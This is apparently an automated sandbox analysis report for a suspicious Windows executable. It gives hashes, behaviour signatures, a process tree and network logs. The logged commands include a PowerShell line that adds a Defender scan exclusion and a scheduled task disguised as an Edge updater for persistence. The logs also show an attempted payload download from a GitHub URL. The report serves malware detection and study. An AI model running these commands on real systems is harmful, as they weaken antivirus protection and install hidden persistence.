Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

3

Static

static

3

a00e0ffba9...JC.exe

windows7-x64

3

a00e0ffba9...JC.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    141s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    08/08/2023, 18:13 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe

  • Size

    2.1MB

  • MD5

    dd8a9df687159b7b689e39f52ea24e59

  • SHA1

    4725058cb525289ac4dea8a90c2ff70ce110b77a

  • SHA256

    a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4

  • SHA512

    3b1fd10bde94721e1b5e33bc0380680b0ddfdc4616d6ee0eeb5201812ea9117f49a5b094507ae4b5aaf78e681eb1c240fbabf6c4a33f1d3d26bf91958b9c131a

  • SSDEEP

    49152:Yb6L/TPtEcWM0kZLH4rYZZFeEcvAJaU2hVv:YuTucmY1ZFm

Score
3/10

Malware Config

Signatures

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious behavior: RenamesItself
    • Suspicious use of WriteProcessMemory
    PID:1036
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Local\Temp\\\""
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2000
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /C SCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe /F
        3⤵
        • Creates scheduled task(s)
        PID:1424
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious use of AdjustPrivilegeToken
      PID:2524
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 896
      2⤵
      • Program crash
      PID:3068
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {22C91869-F9C5-4297-A4A6-F86CB475C3E0} S-1-5-21-1014134971-2480516131-292343513-1000:NYBYVYTJ\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
      C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
      2⤵
        PID:2888
      • C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
        C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
        2⤵
          PID:2512

      Network

      • flag-us
        DNS
        github.com
        a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
        Remote address:
        8.8.8.8:53
        Request
        github.com
        IN A
        Response
        github.com
        IN A
        140.82.114.3
      • flag-us
        GET
        https://github.com/abjula/server/raw/main/2.rar
        a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
        Remote address:
        140.82.114.3:443
        Request
        GET /abjula/server/raw/main/2.rar HTTP/1.1
        accept: */*
        host: github.com
        Response
        HTTP/1.1 404 Not Found
        Server: GitHub.com
        Date: Tue, 08 Aug 2023 18:13:35 GMT
        Content-Type: text/html; charset=utf-8
        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
        Cache-Control: no-cache
        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
        X-Frame-Options: deny
        X-Content-Type-Options: nosniff
        X-XSS-Protection: 0
        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
        Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ wss://*.actions.githubusercontent.com github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
        Transfer-Encoding: chunked
        X-GitHub-Request-Id: C030:41F8:10CA607:18712CF:64D285CE
      • 140.82.114.3:443
        https://github.com/abjula/server/raw/main/2.rar
        tls, http
        a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
        5.2kB
         237.8kB
         104
        178

        HTTP Request

        GET https://github.com/abjula/server/raw/main/2.rar

        HTTP Response

        404
      • 8.8.8.8:53
        github.com
        dns
        a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
        56 B
         72 B
         1
        1

        DNS Request

        github.com

        DNS Response

        140.82.114.3

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1036-65-0x00000000009B0000-0x0000000000BC9000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/1036-66-0x00000000009B0000-0x0000000000BC9000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/2000-56-0x0000000073E00000-0x00000000743AB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2000-57-0x0000000073E00000-0x00000000743AB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2000-58-0x0000000002680000-0x00000000026C0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2000-59-0x0000000002680000-0x00000000026C0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2000-60-0x0000000073E00000-0x00000000743AB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2512-75-0x00000000009B0000-0x0000000000BC9000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/2888-68-0x00000000009B0000-0x0000000000BC9000-memory.dmp

        Filesize

        2.1MB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.